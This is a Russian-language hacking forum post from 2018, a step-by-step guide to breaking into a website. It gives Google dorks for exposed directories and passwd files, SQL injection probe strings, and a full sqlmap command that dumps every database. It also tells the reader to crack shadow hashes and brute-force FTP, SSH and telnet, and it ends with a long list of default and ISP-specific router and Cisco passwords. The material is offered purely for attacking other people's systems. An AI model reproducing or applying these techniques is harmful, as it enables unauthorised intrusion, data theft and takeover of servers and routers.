Настоящий взлом сайта (проверено и отработано!) ¶
By: empty_username on 2018-01-03 15 ч.
Настоящий взлом сайта (проверено и отработано!)
Возможно вам будет что еще добавить или исправить я буду только рад критике (но только если на неё у вас есть основания по типу более достоверной информации). Статью опять же перенес с дургого форума (писал очень давно, а потому могут быть ошибки в меру неопытности).
Для начала нам потребуется стандартный набор софта.
sqlmap (программа для реализации уязвимости в базе данных sql)
Сканер портов (можно любой)
Брут shh, telnet, ftp (использую собственные)
По желанию можно http/https анализатор подключить (для xss реализации уязвимостей)
Пак сплоитов на роутеры (мало ли)
Шаг 1. Сбор информации.
Сначала с помощью гугла собираем инфу что лежит на поверхности при помощи дорков.
Вот дорк для поиска открытых файлов на сайте (так можно слить хайд если это форум) таким дорком легко можно найти софт что лежал на сервере.
site:"sitename.com" intitle:"Index of"
Следующий дорк поможет найти пароли сервера (именно сервера, НЕ сайта!)
site:"sitename.com" intitle:"index of /etc/" intext:"passwd"
Итак, сами пользовательские аккаунты определены в passwd. Системы Linux вдобавок к passwd содержат его файл-компаньон shadow. Он, в отличие от /etc/passwd, доступен для чтения только администратору (если умный админ) и содержит зашифрованную информацию о паролях.
Если мы нашли логин и пароль от аккаунта сервера мы переходим к реализации, а если нет, то мы продолжаем искать уязвимости.
Далее ищем страницы с использованием sql. Вот самые распространенные дорки.
site:"sitename.com" inurl:"php?id="
site:"sitename.com" inurl:"php?cat="
site:"sitename.com" inurl:"php?page="
site:"sitename.com" inurl:"php?type="
Так же можно заменить "php" на "asp", "html" и др. После этого все найденные страницы мы проверяем дописывая в конец и перед символом "&" следующие наборы символов (можно наугад, можно перебором).
'
' and '0'='0
) union all select [t] and (0=0
" union all select [t] and "0"="0
Можно найти и другие наборы символов, но взачастую если отсеяло это, то перебирать прийдется часами различные комбинации. Если нашли страницу ведущую себя странно при вводе этого, тогда переходим к эксплуатации, а если нет то переходим к крайним мерам!
Сканируем порты!
Порты которые мы сможем взломать.
21 - ftp этот порт используется для загрузки файлов (в нашем случае шелла)
22 - ssh этот порт используется что бы отдавать комманды серверу удаленно (взломаем порт - взломаем серв)
23 - telnet примерно похож на ssh (однако ssh можно использовать как тунели)
8080, 1080 - роутер тут все зависит от модели.
Шаг 2. Эксплуатация.
Если нашли по дорку:
site:"sitename.com" intitle:"Index of"
Четкой инструкции тут нет. Ищите ВСЕ что не ровно лежит! Там можно найти файлы с базами данных и серверный софт.
Если нашли по дорку:
site:"sitename.com" intitle:"index of /etc/" intext:"passwd"
Сначала следует расшифровать пароли в shadow (md5(unix) - шифр), потом ищите порты к которым можно приконнектиться с этими данными.
Если нашли страницу с sql следует запустить sql map с следующими данными:
-u "ссылка на уязвимую страницу" --dump-all --level=5 --risk=3 --threads=10 --drop-set-cookie -v 1
Это стандартные параметры которые обеспечат нам более высокий шанс взлома!
Если же мы нашли открытые порты стараемся пробрутить их соответствующей программой.
Если нашли порт роутера (такое тоже бывает (сам был сисадмином и мне запрещали закрывать этот порт от подключений не из локалки)) тогда вводим в браузер:
sitename.com:port
У вас по обыкновению запросит пароль.
Путь 1. Подбор.
Комбинации:
// default pairs
admin <empty>
admin admin
admin 1234
admin password
Admin Admin
<empty> admin
root <empty>
root admin
root root
root public
admin nimda
<empty> root
<empty> <empty>
support <empty>
support support
super super
super APR@xuniL
// ISP specific
admin onlime
admin mts
mts mts
telecomadmin admintelecom
mgts mtsoao
kyivstar kyivstar
admin 0508780503
telekom telekom
superadmin Is$uper@dmin
admin dPZb4GJTu9
admin 2w4f6n8k
// more pairs
admin 1
admin 123
admin 0000
admin 00000000
admin 12345
admin 123456
admin 1234567
admin 12345678
admin 123456789
admin 1234567890
admin qwerty
admin beeline
admin beeline2013
admin iyeh
admin ghbdtn
admin admin225
admin juklop
admin free
admin inet
admin internet
admin asus
admin root
admin ADMIN
admin adsl
admin adslroot
admin adsladmin
admin Ferum
admin Ferrum
admin FERUM
admin FERRUM
admin Kendalf9
admin 263297
admin 590152
admin 21232
admin adn8pzszk
admin amvqnekk
admin biyshs9eq
admin e2b81d_1
admin Dkdk8e89
admin flvbyctnb
admin qweasdOP
admin EbS2P8
admin FhF8WS
admin ZmqVfo
admin ZmqVfo1
admin ZmqVfo2
admin ZmqVfo3
admin ZmqVfo4
admin ZmqVfoVPN
admin ZmqVfoSIP
admin ZmqVfoN1
admin ZmqVfoN2
admin ZmqVfoN3
admin ZmqVfoN4
admin 9f4r5r79//
admin rombik1
admin airocon
admin zyxel
adsl realtek
osteam 5up
root toor
ZXDSL ZXDSL
<empty> support
// Cisco pairs
<empty> Cisco
Cisco Cisco
<empty> cisco
cisco cisco
admin default
admin cisco
admin changeme
<empty> c
<empty> cc
<empty> Cisco router
<empty> letmein
<empty> _Cisco
enable cisco
pnadmin pnadmin
root attack
root Cisco
// user access
user <empty>
user user
<empty> user
2 путь. Эксплоиты (все зависит от модели роутера и вашего набора).